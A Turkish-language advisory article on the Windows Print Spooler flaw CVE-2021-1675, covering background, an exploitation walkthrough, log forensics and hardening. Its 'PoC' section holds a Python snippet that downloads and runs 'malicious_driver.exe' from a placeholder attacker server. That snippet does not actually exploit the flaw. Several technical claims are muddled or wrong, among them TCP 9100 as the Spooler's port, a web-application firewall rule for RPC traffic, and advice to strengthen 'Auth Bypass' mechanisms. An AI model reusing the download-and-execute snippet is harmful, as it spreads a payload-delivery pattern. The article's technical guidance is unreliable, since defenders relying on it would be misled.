CVE-2021-1675 · Bilgilendirme

Microsoft Windows Print Spooler Remote Code Execution Vulnerability

CVE-2021-1675, Microsoft Windows Print Spooler'daki uzaktan kod yürütme zafiyeti, sistemleri tehlikeye atabilir.

Üretici
Microsoft
Ürün
Windows
Seviye
yüksek
Yayın Tarihi
05 Nisan 2026
Okuma
8 dk okuma

CVE-2021-1675: Microsoft Windows Print Spooler Remote Code Execution Vulnerability

Zorluk Seviyesi: Orta | Kaynak: CISA KEV

Zafiyet Analizi ve Giriş

CVE-2021-1675 olarak bilinen zafiyet, Microsoft Windows Print Spooler servisinde meydana gelen ciddi bir uzaktan kod çalıştırma (Remote Code Execution - RCE) güvenlik açığıdır. Bu zafiyet, kötü niyetli bir saldırganın sistemde kod çalıştırmasına olanak tanıyabilir ve bu durum sistemin kontrolünü ele geçirme riskini beraberinde getirir. Windows Print Spooler, yazıcıların yönetimi için kullanılan bir bileşen olduğundan, zafiyetin etkisi geniş bir yelpazede hissedilebilir.

Bu zafiyetin kökeni, Print Spooler servisinin yazıcı sürücülerini yüklerken yeterli güvenlik kontrollerini gerçekleştirmemesi koşuluna dayanmaktadır. Saldırgan, bu hatayı kullanarak sahte bir yazıcı sürücüsü yükleyebilir ve sistemde izinsiz kod çalıştırabilir. Özellikle, hibrid ortamlarda ve kurumsal ağlarda bulunan işletmeler bu zafiyetten daha fazla etkilenebilir. Genellikle bu tür zafiyetler, oturum açma atlaması (Auth Bypass) veya tampon taşması (Buffer Overflow) gibi teknikleri kullanarak suistimal edilir.

CVE-2021-1675, 2021'de keşfedildi ve Microsoft, bu zafiyeti gidermek amacıyla bir yamayı hızlı bir şekilde yayınladı. Ancak zafiyetin doğası gereği, kurumsal ağlarda bulunan eski yazılımlar sıklıkla güncellenmediği için bu tür güvenlik açıkları yıllar boyunca tehdit oluşturmaktadır. Zafiyet, farklı sektörlerde geniş bir etkiye sahip olmuştur. Eğitim kurumları, sağlık hizmetleri, finans ve kamu sektörü gibi çeşitli alanlarda, Print Spooler hizmetinin yaygın olarak kullanılması nedeniyle bu zafiyetten olumsuz etkilenen pek çok kuruluş bulunmaktadır.

Gerçek dünya senaryolarında, bir saldırganın CVE-2021-1675'i nasıl kullanabileceğine dair birkaç örnek vermek önemlidir. Örneğin, bir hedef kuruluşa sızan kötü niyetli bir kullanıcının öncelikle ağdaki bir yazıcıya erişim sağlaması yeterli olabilir. Sonrasında bu kullanıcı, Print Spooler aracılığıyla sahte bir yazıcı sürücüsü yükleyerek sistem üzerinde izinsiz işlemler gerçekleştirebilir. Bu, sadece veri sızıntısına değil, aynı zamanda sistemin ele geçirilmesine ve daha geniş bir saldırının kapılarını açmasına yol açabilir.

Bu zafiyetin etkisini azaltmak için, sistem yöneticilerinin Print Spooler hizmetini kapatmaları veya en azından yalnızca ihtiyaç duyulduğunda kullanmaları önerilmektedir. Ayrıca, tüm işletme ağlarındaki yazılımların güncel tutulması, bu tür zafiyetlerin meydana gelmesini engellemek için kritik bir adımdır. Aynı zamanda, kullanıcıların yetkisiz yazıcı sürücülerini yüklemelerini önlemek amacıyla uygun erişim kontrollerinin sağlanması da gerekmektedir.

Sonuç olarak, CVE-2021-1675 zafiyeti, kurumsal ağların ve sistemlerin güvenliğine yönelik ciddi bir tehdit oluşturmaktadır. Bilgi güvenliği uzmanları ve beyaz şapkalı hackerlar, bu tür zafiyetlerin tespit edilmesi ve giderilmesi konusunda aktif roller üstlenmelidir. Güvenli bir siber ağ oluşturmanın en etkili yolu, sürekli güncelleme, izleme ve eğitim yoluyla bilinçli önlemler almaktan geçmektedir.

Teknik Sömürü (Exploitation) ve PoC

CVE-2021-1675, Microsoft Windows Print Spooler (Yazıcı Sıralayıcı) bileşeninde yer alan kritik bir uzaktan kod yürütme (RCE) açığıdır. Bu zafiyet, saldırganların sistem üzerinde kötü niyetli kod çalıştırmalarına olanak tanıyan bir yöntem sunmaktadır. Özellikle, Print Spooler bileşeni sıklıkla yerel ağda bulunan hedef bilgisayarlara kurulum amacıyla erişildiğinden, bu tür bir açık, iç ağda veya internet üzerinden gerçekleştirilen saldırılar için ciddi tehditler oluşturabilir.

Güvenlik araştırmacıları, bu zafiyetin çeşitli senaryolar üzerinden nasıl sömürülebileceğini detaylandırmaktadır. Genellikle, bu tür bir açığın istismar edilmesi aşağıdaki adımlar ile gerçekleştirilebilir:

  1. Ağın Haritalanması: İlk aşamada, hedef ağda Print Spooler hizmetini çalıştıran sistemlerin tespit edilmesi gerekir. Bunun için, ağ tarayıcıları veya port tarayıcıları (nmap gibi) kullanılabilir. Aşağıdaki komut, ağda hangi makinelerin 135 portunu açık olduğunu kontrol etmenin bir yolunu sunar:

    nmap -p 135 <hedef_ip>

  2. Print Spooler Durumunu Kontrol Etme: Hedef makinenin Print Spooler hizmetinin çalışıp çalışmadığını kontrol edin. Bunun için Windows PowerShell kullanarak aşağıdaki komutu çalıştırabilirsiniz:

    Get-Service -Name Spooler

  3. Zafiyeti Kullanma: Print Spooler hizmetinin çalıştığını ve hedef sistemde uygun izinlerin mevcut olduğunu varsayarak, uzaktan bir yazıcı kurulumu yaparak açığı istismar etmeye başlayabiliriz. Bu, genellikle RPC (Remote Procedure Call) aracılığıyla gerçekleştirilir. Saldırgan, hedef sistemi yazıcı sürücüsü ile yönlendirmek için sahte bir yazıcı sürücüsü yükler.

  4. Kötü Amaçlı Kodun Yürütülmesi: İstismar başarılı olursa, saldırgan, sistem üzerinde komut çalıştırabilir. Örneğin, aşağıdaki Python kodu, bir hedefe kötü niyetli bir yazıcı sürücüsünü yüklemek için bir örnek olarak kullanılabilir:

    import os
import requests

url = "http://<kötü_sunucu>/malicious_driver.exe"
response = requests.get(url)

with open("malicious_driver.exe", "wb") as file:
    file.write(response.content)

os.system("start malicious_driver.exe")

Bu aşamalar, zafiyetin nasıl sömürülebileceğine dair bir yol sunmaktadır. Gerçek senaryolar açısından, birçok siber saldırgan, bu tür açıkları kullanarak kurumsal ağlara sızmakta ve kritik verilere erişim sağlamaktadır. Özellikle büyük kurumlar, bu tip zafiyetlerin hedefi haline gelirken, doğru savunma stratejilerinin uygulanmaması durumunda büyük kayıplar yaşayabilir.

Sonuç olarak, CVE-2021-1675 gibi kritik zafiyetler, sistem yöneticileri ve güvenlik uzmanları için ciddi tehditler oluşturur. Bu tür açıkların tespit edilmesi, güncellenmesi ve düzgün bir şekilde yapılandırılması, siber güvenliğin korunmasında hayati öneme sahiptir. Aksi halde, iç ağda ya da açık bir internet bağlantısı aracılığıyla gerçekleştirilecek saldırılar, büyük yıkım ve veri kayıplarına yol açabilir.

Forensics (Adli Bilişim) ve Log Analizi

CVE-2021-1675, Microsoft Windows Print Spooler hizmetinde bulunan bir uzaktan kod yürütme (Remote Code Execution - RCE) zafiyetidir. Bu zafiyet, saldırganların hedef sistem üzerinde uzaktan kod çalıştırarak sisteme tam erişim sağlamasına olanak tanır. Zafiyetin etkisi, bu hizmetin çalıştığı her Windows sisteminde, yetki seviye sınırlamaları olmasa bile oldukça ciddi sonuçlar doğurabilir.

Adli bilişim (forensics) ve log analizi, bu tür zafiyetlerin kötüye kullanımını tespit etmek için kritik adımlardır. Siber güvenlik uzmanları, bu tür bir saldırının gerçekleşip gerçekleşmediğini anlamak için log dosyalarını detaylı bir şekilde incelemekte ve belirli imzalara (signature) dikkat etmektedir.

Öncelikle, Windows Print Spooler hizmetinin amacı; yazdırma işlemlerinin yönetilmesi ve sıraya konulmasıdır. Saldırganlar, bu hizmet üzerinden kötü niyetli yazıcı sürücüleri yükleyerek sistem üzerinde yetkisiz erişim sağlayabilmektedir. Bu nedenle, log dosyalarında dikkat edilmesi gereken başlıca imzalar şunlardır:

  1. Yazıcı Sürücüsü Yükleme Kayıtları: Windows sistemlerinde yazıcı sürücüsü yükleme işlemleri genellikle Event ID 300. Bu kayıtları inceleyerek, beklenmedik veya şüpheli yazıcı sürücülerinin yüklenip yüklenmediğini tespit edebilirsiniz. Aşağıdaki gibi bir log girişi, şüpheli bir yükleme olabilir:
   Event ID: 300
   Source: PrintService
   User: NT AUTHORITY\SYSTEM
   Description: Print driver {SÜRÜCÜ_ADI} installed.
  1. Port Dinleme Kayıtları: Print Spooler, genellikle TCP 9100 numaralı port üzerinden çalışmaktadır. Bu port üzerinde gerçekleştirilen anormal ağ trafiği, bir uzaktan kod yürütme saldırısı gerçekleşip gerçekleşmediği konusunda ipuçları verebilir. Ağ trafiğini incelemek için, ilgili port üzerinde gelen-giden paketleri inceleyebilirsiniz:
   netstat -ano | findstr :9100

  1. Yetkisiz Erişim Kayıtları: Event ID 4625 üzerinde yapılan incelemeler, yetkisiz giriş denemelerini gösterebilir. Yetkisiz girişler, saldırganların sistemde daha fazla hak talep ettiğine işaret edebilir. Kullanıcı adı ve kaynak IP adresi gibi bilgilere odaklanarak, anormal davranışlar tespit edilebilir.

  2. Process Creation Logları: Event ID 4688'de, şüpheli işlem oluşturma kayıtları yer almaktadır. Burada, Print Spooler ile bağlantılı beklenmedik işlemler gözlemlenmeli. Şu tarz bir girdi, dikkat gerektiren bir durumu temsil edebilir:

   Event ID: 4688 
   Process Name: C:\Windows\System32\spoolsv.exe

Sakıncalı kodların çalıştırılması ve yetkisiz erişimlerin tespiti, bu log dosyalarının incelenmesiyle mümkündür. Siber güvenlik uzmanları, bu tür logları analiz ederek, CVE-2021-1675 gibi zafiyetlerin kötüye kullanımının önüne geçebilir ve sistem güvenliğini sağlayabilirler. Adli bilişim süreçleri, bu tür bir saldırının tespit edilmesi için en etkili yöntemlerden biridir ve önceden belirlenmiş imzalar üzerinden bir analiz süreci geliştirerek, olası riskleri minimize etmek mümkündür.

Bu nedenle, güvenlik ekiplerinizin log dosyalarını düzenli olarak analiz ederek, bu tür zafiyetlerin olumsuz etkilerinden korunması kritik öneme sahiptir.

Savunma ve Sıkılaştırma (Hardening)

Microsoft Windows Print Spooler'da bulunan CVE-2021-1675 zafiyeti, bir siber saldırganın uzaktan kod çalıştırmasına (Remote Code Execution - RCE) olanak tanımaktadır. Bu tür bir güvenlik açığı, bilgisayar sistemlerine kötü niyetli yazılımlar yüklemek veya sistem yöneticisi haklarına erişim sağlamak için kullanılabilir. Saldırganlar, Print Spooler hizmetine yönelik kötü niyetli talepler göndererek, bağlamı değiştirebilir ve sisteme zarar verebilirler. Bu nedenle, CVE-2021-1675'in etkilerini azaltmak ve potansiyel riskleri yönetmek için sıkılaştırma (hardening) önlemleri almak kritik bir önem taşımaktadır.

Bu açığı kapatmanın en iyi yollarından biri, Print Spooler hizmetinin devre dışı bırakılmasıdır. Eğer yazıcı ihtiyacı azsa veya yalnızca belirli kullanıcılarla sınırlıysa bu en basit ve etkili çözümlerden biridir. Print Spooler hizmetini devre dışı bırakmak için aşağıdaki komutları kullanabilirsiniz:

Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled

Eğer yazıcı kullanılacaksa, bu durumda yazıcıları güvenli bir ortamda yönetmek için Üzerinde çalıştığınız ağın güvenliğine dikkat edilmelidir. Ayrıca, yazıcıların yalnızca yetkilendirilmiş kullanıcılar tarafından erişilebilir olmasını sağlamak uğruna yetkilendirme (Auth Bypass - yetkilendirme geçişi) mekanizmalarının güçlendirilmesi gerekmektedir. Bu, ağdaki tüm cihazların güncel yazılımlarını kullanmalarını gerektirir.

Ağınızı korumak için alternatif güvenlik duvarı (WAF) kuralları uygulanabilir. Örneğin, belirli IP aralıklarından gelen Print Spooler taleplerini engellemek, bu zafiyetten yararlanmayı gereksiz hale getirebilir. Farklı region veya departmana ait yazıcıların yalnızca o bölgedeki kullanıcılar tarafından erişilebilir olmasını sağlayarak yarattığınız güvenlik katmanlarını arttırmış olursunuz. Örneğin, aşağıda bir WAF kuralı örneği bulunmaktadır.

SecRule REQUEST_HEADERS:User-Agent "@streq EvilPrintJob" "id:12345,phase:1,deny,status:403"

Buna ek olarak, sistem güncellemelerine (patch) her zaman dikkat etmek önemlidir. Microsoft, zafiyeti gidermek için güvenlik yamaları yayınlamaktadır. Bu yamaların zamanında uygulanması, sistem bağlılığınızı ve güvenliğinizi artıracaktır.

Sıkılaştırma önerileri arasında, envanter yönetiminin güçlendirilmesi bulunmaktadır. Aktif olarak kullanılan yazıcıların ve kullanıcıların listesini güncelleyerek, sisteminizi gereksiz yere riske atmadan kontrol altında tutmak önemlidir. Kullanıcıların yalnızca iş gereksinimleri doğrultusunda erişim hakları olması da önem taşır. Bu, bir saldırganın kötü niyetli bir şekilde Print Spooler üzerinden sisteme sızmasını zorlaştırır.

Son olarak, bu tür kritik yazılımların güvenlik durumu sürekli izlenmelidir. Sızma testleri (penetration testing) ile sistemi test etmek, olası zayıflıkların önceden tespit edilmesine olanak tanıyabilir. Güvenlik açıklarıyla ilgili verimli geri bildirim almak için güncel tehdit bilgilerini takip etmek de faydalı olacaktır.

Tüm bu öneriler, Microsoft Windows Print Spooler hizmetinin güvenliğini artırmak ve kötü niyetli aktiviteleri engellemek amacıyla uygulanabilecek pratik ve etkili yaklaşımlardır. Her zaman en iyi güvenlik uygulamalarını ve güncellemeleri takip etmek, sistemlerinizin daha az riskli hale gelmesini sağlayacaktır.